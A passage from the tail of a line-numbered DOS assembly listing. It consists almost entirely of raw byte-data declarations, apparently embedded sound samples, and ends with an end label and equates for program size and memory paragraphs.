  1033.         db 0E2h,000h,00Bh,021h,03Fh,0A7h,0FFh,06Ch,063h,0FFh,078h,073h,0DFh
  1034.  
  1035.         db 050h,000h,000h,04Dh,09Fh,0FFh,082h,033h,0E7h,0C0h,059h,0AFh,098h
  1036.  
  1037.         db 000h,02Bh,03Fh,062h,0F1h,0A6h,073h,0DFh,0FFh,040h,08Bh,0D0h,000h
  1038.  
  1039.         db 000h,017h,05Fh,0FDh,0FFh,058h,08Fh,0FFh,06Dh,0B7h,0ECh,008h,000h
  1040.  
  1041.         db 027h,07Bh,0C6h,0D2h,075h,097h,0FFh,060h,076h,0C8h,018h,000h,000h
  1042.  
  1043.         db 065h,0AFh,0FFh,096h,073h,0FFh,088h,07Fh,0DAh,040h,000h,000h,07Bh
  1044.  
  1045.         db 09Fh,0E0h,082h,069h,0FFh,0D4h,05Fh,066h,080h,000h,027h,049h,062h
  1046.  
  1047.         db 09Dh,0AAh,099h,0FFh,0F8h,038h,096h,0D4h,000h,000h,027h,077h,0FFh
  1048.  
  1049.         db 0FCh,068h,09Fh,0FFh,065h,0AFh,0D8h,000h,000h,02Fh,09Ah,07Fh,088h
  1050.  
  1051.         db 06Dh,0CFh,0FFh,062h,06Dh,0B1h,028h,000h,019h,065h,0BFh,0F4h,062h
  1052.  
  1053.         db 08Bh,0FFh,084h,077h,0EBh,054h,000h,000h,05Dh,0AFh,0FFh,08Ah,057h
  1054.  
  1055.         db 0FFh,068h,069h,0ABh,084h,000h,000h,065h,099h,0FFh,09Ch,05Bh,0EFh
  1056.  
  1057.         db 0E4h,09Dh,093h,09Ah,000h,000h,07Fh,093h,08Eh,089h,06Ch,0E5h,0FFh
  1058.  
  1059.         db 05Dh,074h,0CFh,038h,000h,023h,079h,09Bh,0DEh,091h,0AFh,0FFh,05Ch
  1060.  
  1061.         db 073h,0A7h,084h,000h,000h,046h,09Fh,0FFh,080h,053h,0DFh,0E4h,077h
  1062.  
  1063.         db 08Ah,0B8h,000h,000h,06Bh,089h,0A4h,084h,085h,0BFh,0FFh,050h,02Bh
  1064.  
  1065.         db 0C7h,068h,000h,00Fh,055h,0B5h,0FFh,0D0h,014h,0CFh,084h,059h,0DDh
  1066.  
  1067.         db 0C0h,000h,000h,08Fh,0B6h,0CBh,09Ah,050h,0D7h,0FFh,026h,055h,0A2h
  1068.  
  1069.         db 008h,000h,03Bh,06Ch,08Ah,0D3h,094h,083h,0FFh,082h,091h,0E7h,060h
  1070.  
  1071.         db 000h,00Ch,095h,082h,09Ch,0B3h,07Ah,0E7h,0FEh,028h,059h,0D7h,058h
  1072.  
  1073.         db 000h,001h,03Fh,0BFh,0FFh,078h,063h,0FFh,086h,0B3h,0FFh,040h,000h
  1074.  
  1075.         db 000h,06Dh,08Fh,0D9h,0A1h,060h,0B3h,0D2h,0C7h,074h,048h,000h,045h
  1076.  
  1077.         db 04Bh,03Bh,097h,0B8h,0A2h,0D3h,0FFh,064h,071h,0CEh,004h,00Bh,01Bh
  1078.  
  1079.         db 052h,07Bh,0C1h,0F6h,0A4h,0C5h,0C0h,065h,072h,0C6h,000h,000h,00Ah
  1080.  
  1081.         db 03Fh,0DFh,0FFh,058h,06Bh,0FAh,044h,0A7h,0FFh,028h,000h,03Bh,0BDh
  1082.  
  1083.         db 0FAh,0FFh,088h,07Bh,0FFh,058h,062h,057h,060h,000h,000h,043h,08Bh
  1084.  
  1085.         db 0FFh,098h,06Ah,0E7h,0D0h,062h,08Ah,0B0h,000h,005h,05Fh,0B5h,0B2h
  1086.  
  1087.         db 0A4h,072h,0D7h,0FFh,038h,087h,088h,01Ch,027h,053h,06Ah,09Dh,0FFh
  1088.  
  1089.         db 070h,075h,0FDh,048h,063h,0C5h,080h,000h,015h,06Bh,0B7h,0FFh,084h
  1090.  
  1091.         db 048h,0A7h,0E0h,061h,0B3h,088h,000h,031h,03Eh,062h,09Bh,0ECh,058h
  1092.  
  1093.         db 05Bh,0FFh,054h,06Bh,0B5h,0A0h,000h,000h,061h,091h,0FFh,090h,043h
  1094.  
  1095.         db 0EFh,0B8h,09Ah,09Fh,0A8h,000h,027h,031h,05Bh,09Ch,0BAh,0B0h,0BFh
  1096.  
  1097.         db 0F5h,04Ah,07Fh,0E5h,042h,000h,000h,056h,0BBh,0FFh,090h,03Fh,0FFh
  1098.  
  1099.         db 090h,0BFh,0D7h,094h,000h,000h,05Fh,08Eh,0FFh,080h,04Eh,0A5h,0D8h
  1100.  
  1101.         db 07Fh,064h,094h,000h,000h,03Bh,088h,074h,068h,0BFh,0FBh,0FFh,04Ah
  1102.  
  1103.         db 05Fh,0A5h,092h,015h,000h,01Fh,07Bh,0FFh,0FFh,052h,0DFh,050h,09Fh
  1104.  
  1105.         db 0D3h,0C0h,000h,000h,053h,08Dh,0FFh,098h,036h,087h,0D4h,08Bh,06Dh
  1106.  
  1107.         db 0B4h,000h,000h,035h,07Dh,0CBh,0F8h,0BAh,074h,0FFh,078h,075h,09Ah
  1108.  
  1109.         db 050h,000h,000h,0AEh,082h,073h,0A6h,0B0h,0FFh,0C8h,03Bh,052h,099h
  1110.  
  1111.         db 032h,000h,023h,044h,07Fh,0FFh,0FFh,058h,087h,046h,07Bh,0F3h,0CAh
  1112.  
  1113.         db 000h,000h,05Fh,0CAh,0FFh,0FEh,024h,077h,0B8h,039h,076h,0B4h,00Eh
  1114.  
  1115.         db 000h,02Bh,08Eh,0ABh,0FFh,070h,063h,0FFh,080h,09Ch,0BBh,054h,000h
  1116.  
  1117.         db 00Fh,06Ah,0A5h,0D6h,09Ah,099h,0DDh,0D4h,056h,067h,094h,000h,000h
  1118.  
  1119.         db 01Dh,066h,0BBh,0FFh,070h,067h,0D0h,06Fh,096h,0DEh,048h,000h,036h
  1120.  
  1121.         db 06Fh,09Ah,0FFh,070h,027h,0C9h,056h,06Ch,08Fh,084h,000h,023h,057h
  1122.  
  1123.         db 086h,0FFh,0F4h,080h,04Fh,0F5h,06Eh,082h,0C9h,020h,000h,003h,05Bh
  1124.  
  1125.         db 099h,0FFh,0C0h,03Ch,0EBh,080h,08Fh,09Dh,0A8h,006h,00Eh,056h,077h
  1126.  
  1127.         db 0DFh,0FFh,060h,07Fh,0B0h,06Eh,062h,0CEh,01Ah,017h,047h,05Dh,085h
  1128.  
  1129.         db 0FFh,0FFh,040h,097h,05Ah,05Eh,06Fh,0B4h,000h,037h,050h,07Fh,0ABh
  1130.  
  1131.         db 0FFh,0D8h,000h,0A7h,040h,047h,07Fh,08Ch,01Ch,023h,06Dh,080h,0C7h
  1132.  
  1133.         db 0FFh,080h,019h,0D2h,030h,056h,09Fh,070h,018h,02Dh,086h,0A8h,0FFh
  1134.  
  1135.         db 0FFh,070h,08Fh,0A0h,03Ch,018h,09Fh,070h,00Ah,053h,095h,099h,0FFh
  1136.  
  1137.         db 0FFh,044h,08Bh,088h,02Dh,00Fh,0ADh,044h,006h,067h,0A2h,085h,0EBh
  1138.  
  1139.         db 0FFh,030h,04Fh,094h,013h,000h,0BBh,035h,037h,083h,08Ch,093h,0FFh
  1140.  
  1141.         db 0FFh,040h,06Dh,0A8h,023h,027h,0AFh,034h,047h,072h,092h,07Fh,0EBh
  1142.  
  1143.         db 0FFh,054h,04Bh,0C0h,039h,044h,09Dh,054h,055h,075h,0C6h,084h,096h
  1144.  
  1145.         db 0FFh,0A0h,033h,0BFh,04Ch,02Ch,056h,08Ah,055h,087h,0B3h,062h,051h
  1146.  
  1147.         db 0C7h,0DCh,02Eh,08Fh,094h,020h,02Ah,07Dh,06Eh,0BDh,0ACh,06Ch,04Ch
  1148.  
  1149.         db 0A3h,0FFh,080h,03Eh,0B3h,030h,02Ah,04Dh,08Eh,04Dh,095h,0A3h,06Ch
  1150.  
  1151.         db 057h,0AFh,0FFh,060h,05Bh,0D5h,032h,04Fh,06Fh,064h,05Eh,0CDh,0A0h
  1152.  
  1153.         db 03Ah,06Fh,0CDh,0C0h,04Ah,082h,0DBh,02Ch,06Dh,04Bh,04Eh,087h,0B8h
  1154.  
  1155.         db 06Bh,058h,07Fh,09Eh,0CCh,072h,073h,0D5h,030h,06Fh,067h,048h,05Bh
  1156.  
  1157.         db 0BAh,09Ch,058h,07Dh,099h,0D4h,094h,06Ch,0C3h,04Ch,079h,03Eh,025h
  1158.  
  1159.         db 06Bh,0D4h,078h,072h,07Bh,07Ah,0BBh,0C1h,04Ah,08Bh,088h,02Bh,058h
  1160.  
  1161.         db 034h,046h,0DDh,09Ah,080h,072h,06Ch,08Fh,0FFh,070h,013h,0B1h,030h
  1162.  
  1163.         db 086h,055h,05Fh,0C7h,0B4h,082h,075h,087h,08Dh,0FFh,078h,000h,0A7h
  1164.  
  1165.         db 058h,07Bh,070h,03Ah,05Bh,0BCh,08Eh,0A8h,0ACh,034h,08Fh,0D8h,028h
  1166.  
  1167.         db 05Bh,0E0h,028h,07Fh,059h,029h,0ABh,0CCh,064h,06Bh,080h,049h,0AFh
  1168.  
  1169.         db 0D0h,023h,07Fh,0B0h,00Eh,089h,061h,02Fh,0B7h,0B2h,070h,092h,088h
  1170.  
  1171.         db 06Fh,0EFh,090h,023h,09Bh,0B4h,035h,08Ch,03Dh,03Fh,0D3h,094h,08Bh
  1172.  
  1173.         db 0C7h,060h,03Bh,0B9h,082h,069h,0CFh,0A0h,027h,084h,02Ah,04Bh,0EFh
  1174.  
  1175.         db 08Ch,07Eh,08Ch,050h,05Fh,0E3h,079h,04Fh,0AFh,078h,01Bh,081h,02Ch
  1176.  
  1177.         db 03Dh,0D3h,078h,077h,0B3h,066h,055h,0BFh,082h,069h,0B2h,0A8h,025h
  1178.  
  1179.         db 08Ah,035h,043h,0D3h,09Ch,07Bh,09Bh,05Ah,03Dh,0AFh,0C6h,07Fh,077h
  1180.  
  1181.         db 07Fh,062h,06Ah,096h,05Dh,073h,0AAh,06Ah,08Ch,08Ah,054h,04Fh,08Eh
  1182.  
  1183.         db 0AAh,07Bh,06Fh,09Ch,070h,05Dh,084h,056h,07Fh,0C5h,085h,073h,060h
  1184.  
  1185.         db 05Ah,071h,0C3h,0A8h,050h,056h,064h,071h,087h,0ACh,04Bh,071h,088h
  1186.  
  1187.         db 074h,0A4h,08Bh,085h,069h,072h,0A9h,090h,067h,07Ch,0A8h,038h,07Fh
  1188.  
  1189.         db 088h,05Bh,07Fh,0A5h,06Ah,073h,0B9h,05Bh,056h,0B2h,05Ah,042h,0A2h
  1190.  
  1191.         db 0CCh,044h,037h,079h,055h,073h,0E2h,0A5h,06Bh,091h,062h,056h,0B7h
  1192.  
  1193.         db 0ACh,051h,05Fh,0A1h,090h,02Eh,0A3h,07Eh,045h,09Fh,0A2h,07Ch,095h
  1194.  
  1195.         db 08Ah,070h,067h,0AEh,074h,055h,0A7h,0DBh,018h,033h,066h,06Ch,07Bh
  1196.  
  1197.         db 0C3h,090h,049h,07Dh,093h,076h,0B3h,0B0h,041h,046h,0A3h,08Dh,02Ah
  1198.  
  1199.         db 08Fh,075h,046h,087h,0B2h,07Bh,07Eh,091h,06Eh,071h,09Fh,08Ah,069h
  1200.  
  1201.         db 070h,092h,08Ah,04Fh,096h,090h,056h,07Dh,090h,084h,07Dh,0A1h,086h
  1202.  
  1203.         db 066h,084h,08Bh,073h,081h,080h,084h,072h,089h,082h,06Bh,06Eh,07Fh
  1204.  
  1205.         db 080h,077h,079h,095h,091h,059h,059h,081h,070h,069h,08Bh,08Eh,088h
  1206.  
  1207.         db 059h,07Ch,06Dh,097h,083h,06Eh,07Fh,087h,093h,087h,078h,05Ch,078h
  1208.  
  1209.         db 098h,07Eh,077h,08Fh,097h,062h,067h,080h,066h,07Eh,0A1h,07Ah,07Dh
  1210.  
  1211.         db 089h,095h,078h,055h,073h,092h,08Ch,077h,07Dh,096h,092h,04Ah,05Fh
  1212.  
  1213.         db 06Eh,087h,092h,08Ch,082h,085h,092h,078h,058h,06Ch,092h,073h,073h
  1214.  
  1215.         db 086h,08Eh,07Fh,05Eh,04Ah,06Ch,073h,092h,0A0h,07Eh,090h,097h,08Bh
  1216.  
  1217.         db 073h,070h,078h,089h,089h,075h,079h,08Fh,08Eh,07Ah,040h,05Fh,07Ch
  1218.  
  1219.         db 086h,085h,0A2h,0A9h,084h,07Fh,075h,05Ch,073h,09Ch,076h,061h,07Fh
  1220.  
  1221.         db 079h,075h,092h,082h,031h,069h,086h,076h,09Fh,0B1h,07Eh,073h,092h
  1222.  
  1223.         db 06Bh,067h,097h,087h,074h,078h,07Ah,085h,099h,065h,067h,088h,054h
  1224.  
  1225.         db 069h,085h,084h,087h,0A3h,08Ch,078h,09Fh,086h,053h,067h,07Ch,068h
  1226.  
  1227.         db 075h,092h,078h,072h,07Ch,062h,07Dh,0AFh,090h,06Bh,07Ch,06Eh,068h
  1228.  
  1229.         db 08Fh,0A0h,078h,06Ah,072h,075h,08Dh,08Ch,07Eh,089h,072h,054h,072h
  1230.  
  1231.         db 08Bh,089h,07Fh,072h,06Bh,08Ah,0A2h,089h,08Fh,085h,066h,071h,093h
  1232.  
  1233.         db 088h,074h,078h,06Dh,070h,08Ah,088h,089h,08Dh,072h,06Bh,080h,078h
  1234.  
  1235.         db 079h,070h,069h,06Ch,07Ch,08Bh,082h,08Bh,078h,06Ah,087h,081h,07Eh
  1236.  
  1237.         db 08Eh,070h,05Fh,079h,085h,07Fh,087h,07Ah,05Fh,08Ah,0A4h,076h,079h
  1238.  
  1239.         db 080h,06Ah,069h,075h,07Eh,093h,0A5h,081h,072h,088h,088h,085h,090h
  1240.  
  1241.         db 078h,060h,071h,07Bh,07Fh,084h,07Ah,068h,07Ah,08Ch,07Fh,07Ah,070h
  1242.  
  1243.         db 068h,076h,07Ch,077h,093h,0A2h,080h,086h,07Dh,07Bh,083h,08Eh,068h
  1244.  
  1245.         db 064h,074h,06Eh,077h,097h,074h,068h,080h,080h,071h,08Bh,07Ch,059h
  1246.  
  1247.         db 079h,08Ah,074h,099h,09Ch,066h,07Fh,0A6h,07Fh,08Fh,0A0h,056h,06Dh
  1248.  
  1249.         db 0A2h,06Ch,07Dh,09Dh,060h,05Fh,098h,072h,063h,097h,088h,048h,07Dh
  1250.  
  1251.         db 085h,069h,0A3h,088h,04Eh,063h,09Fh,091h,077h,08Ch,074h,042h,085h
  1252.  
  1253.         db 09Ch,06Ch,095h,066h,051h,08Fh,0CFh,07Ah,073h,09Ah,080h,065h,097h
  1254.  
  1255.         db 080h,05Ah,081h,04Ch,04Ah,09Eh,09Ch,074h,07Fh,083h,086h,097h,09Ah
  1256.  
  1257.         db 069h,07Fh,08Ch,060h,06Fh,0A0h,077h,06Eh,08Ch,08Eh,07Dh,083h,083h
  1258.  
  1259.         db 064h,07Ah,074h,05Eh,079h,09Fh,07Ah,063h,083h,092h,069h,091h,088h
  1260.  
  1261.         db 052h,075h,070h,069h,08Fh,0A0h,06Bh,074h,0ABh,08Eh,062h,08Dh,066h
  1262.  
  1263.         db 063h,08Ah,071h,07Bh,0BBh,098h,068h,087h,0A4h,077h,097h,08Ch,044h
  1264.  
  1265.         db 056h,069h,071h,0A7h,094h,05Dh,05Eh,0A4h,07Ch,077h,08Eh,05Ch,04Dh
  1266.  
  1267.         db 07Eh,074h,07Bh,0ACh,078h,059h,0A3h,0A4h,060h,082h,084h,049h,075h
  1268.  
  1269.         db 081h,07Eh,0ADh,0A5h,071h,07Fh,0BAh,074h,071h,084h,04Ah,05Bh,073h
  1270.  
  1271.         db 071h,087h,0ADh,07Ch,062h,0ADh,093h,073h,097h,06Ah,03Fh,070h,077h
  1272.  
  1273.         db 07Bh,0B5h,088h,058h,08Bh,0A8h,061h,079h,080h,045h,06Eh,075h,071h
  1274.  
  1275.         db 09Bh,0B2h,072h,06Bh,0B0h,080h,078h,096h,061h,042h,05Fh,073h,08Dh
  1276.  
  1277.         db 0B4h,088h,068h,0A3h,096h,06Fh,08Dh,07Ch,04Ah,05Eh,06Ch,07Fh,0BBh
  1278.  
  1279.         db 0A0h,070h,08Fh,0B0h,07Eh,07Fh,08Ah,040h,030h,063h,086h,0AFh,0ACh
  1280.  
  1281.         db 066h,063h,0B3h,080h,07Ch,07Eh,04Ch,03Fh,059h,079h,096h,09Bh,084h
  1282.  
  1283.         db 077h,0ADh,090h,071h,085h,080h,03Eh,041h,073h,093h,0D3h,0B2h,076h
  1284.  
  1285.         db 091h,09Ah,083h,0A3h,090h,040h,038h,05Bh,08Ah,0A7h,088h,071h,086h
  1286.  
  1287.         db 090h,06Bh,07Eh,083h,052h,043h,057h,08Bh,0BBh,0C0h,080h,07Fh,0AAh
  1288.  
  1289.         db 068h,07Bh,094h,050h,030h,048h,076h,09Dh,0A6h,07Dh,072h,0A7h,07Ah
  1290.  
  1291.         db 069h,07Ah,07Dh,054h,065h,06Ch,085h,0A9h,0AAh,095h,0B2h,09Ch,059h
  1292.  
  1293.         db 089h,0A1h,04Ch,049h,060h,07Eh,0C3h,0C0h,080h,083h,0A9h,067h,07Bh
  1294.  
  1295.         db 08Dh,060h,03Ch,05Ah,085h,081h,07Eh,079h,08Dh,0B3h,060h,05Bh,07Bh
  1296.  
  1297.         db 064h,03Dh,053h,06Ch,093h,0B5h,090h,08Ah,0BBh,07Ah,06Fh,08Fh,076h
  1298.  
  1299.         db 046h,05Fh,070h,087h,0B3h,08Ch,07Ch,0AEh,078h,059h,085h,07Eh,048h
  1300.  
  1301.         db 050h,07Bh,09Dh,0C1h,0A1h,08Fh,09Fh,098h,073h,085h,07Ch,048h,055h
  1302.  
  1303.         db 07Ah,083h,083h,08Bh,08Bh,0A0h,0A8h,068h,06Fh,087h,05Eh,04Ah,061h
  1304.  
  1305.         db 083h,095h,0A1h,090h,08Fh,0A8h,068h,067h,07Fh,062h,03Ah,056h,06Eh
  1306.  
  1307.         db 097h,0B3h,087h,076h,09Fh,096h,06Ah,083h,080h,043h,056h,07Eh,088h
  1308.  
  1309.         db 087h,08Fh,090h,0ADh,0B4h,060h,066h,08Dh,06Dh,044h,05Ch,075h,096h
  1310.  
  1311.         db 0CAh,08Ch,063h,098h,071h,079h,087h,078h,044h,04Bh,083h,097h,09Bh
  1312.  
  1313.         db 08Ah,07Ch,09Eh,0ACh,061h,05Fh,07Fh,062h,04Ah,067h,08Ah,095h,0BBh
  1314.  
  1315.         db 098h,08Ch,0BDh,084h,085h,091h,06Ch,045h,059h,085h,08Bh,095h,08Bh
  1316.  
  1317.         db 083h,0A4h,08Ch,04Dh,06Ah,08Bh,060h,048h,05Eh,07Fh,0ADh,0CCh,07Ch
  1318.  
  1319.         db 068h,09Ch,064h,083h,089h,054h,036h,04Fh,07Dh,096h,0AFh,088h,072h
  1320.  
  1321.         db 086h,0A0h,08Bh,074h,05Bh,04Dh,073h,078h,087h,09Eh,09Dh,092h,0A5h
  1322.  
  1323.         db 0BCh,076h,07Bh,085h,059h,055h,06Ch,081h,093h,0A7h,0A1h,07Bh,07Ch
  1324.  
  1325.         db 084h,06Dh,07Ch,07Bh,042h,039h,057h,07Dh,0C5h,0ACh,05Ah,071h,092h
  1326.  
  1327.         db 06Ah,08Ah,09Fh,061h,046h,06Eh,099h,0BBh,0ABh,076h,073h,0A4h,068h
  1328.  
  1329.         db 069h,06Fh,061h,036h,04Dh,07Bh,09Fh,0D1h,0A2h,081h,0B2h,098h,07Eh
  1330.  
  1331.         db 093h,086h,04Bh,04Dh,077h,08Dh,0A7h,092h,07Ah,09Dh,0A0h,057h,072h
  1332.  
  1333.         db 07Ah,05Ch,063h,065h,06Fh,09Fh,0CDh,08Dh,074h,09Ch,060h,063h,089h
  1334.  
  1335.         db 070h,035h,046h,070h,095h,0C6h,090h,061h,085h,094h,06Ah,07Fh,07Eh
  1336.  
  1337.         db 04Ah,05Ch,066h,076h,0A5h,0BAh,090h,087h,0BAh,082h,07Eh,095h,086h
  1338.  
  1339.         db 04Ch,054h,07Dh,09Eh,0C9h,0A0h,06Ch,093h,086h,065h,073h,078h,03Dh
  1340.  
  1341.         db 058h,065h,06Fh,08Ah,0AAh,090h,094h,0A1h,055h,062h,08Bh,068h,03Eh
  1342.  
  1343.         db 04Ch,06Ch,09Bh,0D8h,090h,06Eh,0ACh,086h,07Dh,092h,076h,044h,052h
  1344.  
  1345.         db 073h,089h,0B9h,096h,06Eh,08Dh,0A2h,065h,06Dh,084h,04Ah,05Dh,079h
  1346.  
  1347.         db 090h,085h,094h,0ADh,0BBh,0C4h,066h,062h,083h,08Eh,056h,054h,068h
  1348.  
  1349.         db 07Bh,0BFh,0BCh,070h,082h,063h,06Eh,08Dh,085h,040h,04Ah,069h,085h
  1350.  
  1351.         db 0BDh,090h,05Ch,075h,09Ah,073h,07Bh,088h,050h,053h,074h,087h,097h
  1352.  
  1353.         db 0ADh,08Eh,085h,0B3h,080h,073h,07Bh,076h,048h,059h,098h,092h,088h
  1354.  
  1355.         db 08Ch,099h,0B6h,0A8h,05Bh,064h,081h,05Ch,050h,058h,066h,085h,0BFh
  1356.  
  1357.         db 0A6h,072h,082h,057h,077h,0A5h,07Ch,04Dh,062h,07Bh,092h,0CAh,088h
  1358.  
  1359.         db 054h,095h,080h,069h,07Bh,080h,04Ch,059h,07Ah,092h,0B5h,0B0h,079h
  1360.  
  1361.         db 08Dh,09Ah,07Fh,07Fh,084h,057h,056h,076h,091h,09Fh,0A2h,088h,08Ah
  1362.  
  1363.         db 0A5h,06Ah,06Dh,075h,05Ch,049h,062h,079h,087h,0BEh,099h,066h,08Eh
  1364.  
  1365.         db 076h,07Eh,08Bh,074h,04Dh,05Bh,077h,089h,0AFh,0A0h,061h,07Bh,082h
  1366.  
  1367.         db 065h,077h,08Eh,068h,068h,073h,08Eh,0A6h,0CAh,08Dh,065h,087h,08Bh
  1368.  
  1369.         db 084h,076h,07Ch,054h,063h,075h,08Ah,0ADh,0B5h,078h,077h,093h,06Fh
  1370.  
  1371.         db 07Bh,086h,060h,05Dh,068h,07Ah,093h,0C5h,08Ch,055h,083h,069h,071h
  1372.  
  1373.         db 076h,072h,056h,05Ch,06Bh,081h,0ADh,0C4h,080h,067h,07Ah,061h,077h
  1374.  
  1375.         db 096h,07Ah,072h,06Dh,07Eh,095h,0C2h,0B8h,064h,06Fh,072h,069h,078h
  1376.  
  1377.         db 09Ah,078h,06Eh,073h,087h,0A7h,0CEh,098h,050h,07Eh,073h,074h,07Dh
  1378.  
  1379.         db 088h,062h,066h,07Fh,091h,09Fh,0C3h,080h,058h,07Eh,060h,065h,081h
  1380.  
  1381.         db 078h,057h,05Fh,088h,08Ch,0A0h,0B5h,076h,057h,070h,058h,070h,094h
  1382.  
  1383.         db 075h,05Ch,077h,09Ch,08Ah,0A3h,0B8h,068h,05Fh,08Ch,06Dh,06Ah,095h
  1384.  
  1385.         db 07Bh,06Bh,085h,093h,08Ah,0AFh,0B0h,064h,05Fh,08Fh,063h,069h,08Fh
  1386.  
  1387.         db 067h,063h,07Dh,08Ah,082h,0A9h,0A8h,05Eh,05Dh,08Ah,060h,06Ah,089h
  1388.  
  1389.         db 074h,073h,07Fh,092h,07Ch,089h,0B3h,081h,05Fh,093h,072h,066h,07Ah
  1390.  
  1391.         db 08Eh,07Eh,089h,094h,080h,07Eh,09Fh,098h,064h,088h,              
  1392.  
  1393. slutt:
  1394.  
  1395.  
  1396.  
  1397. size    equ $-100h
  1398.  
  1399. pgf     equ ($+16)/16
  1400.  
  1401.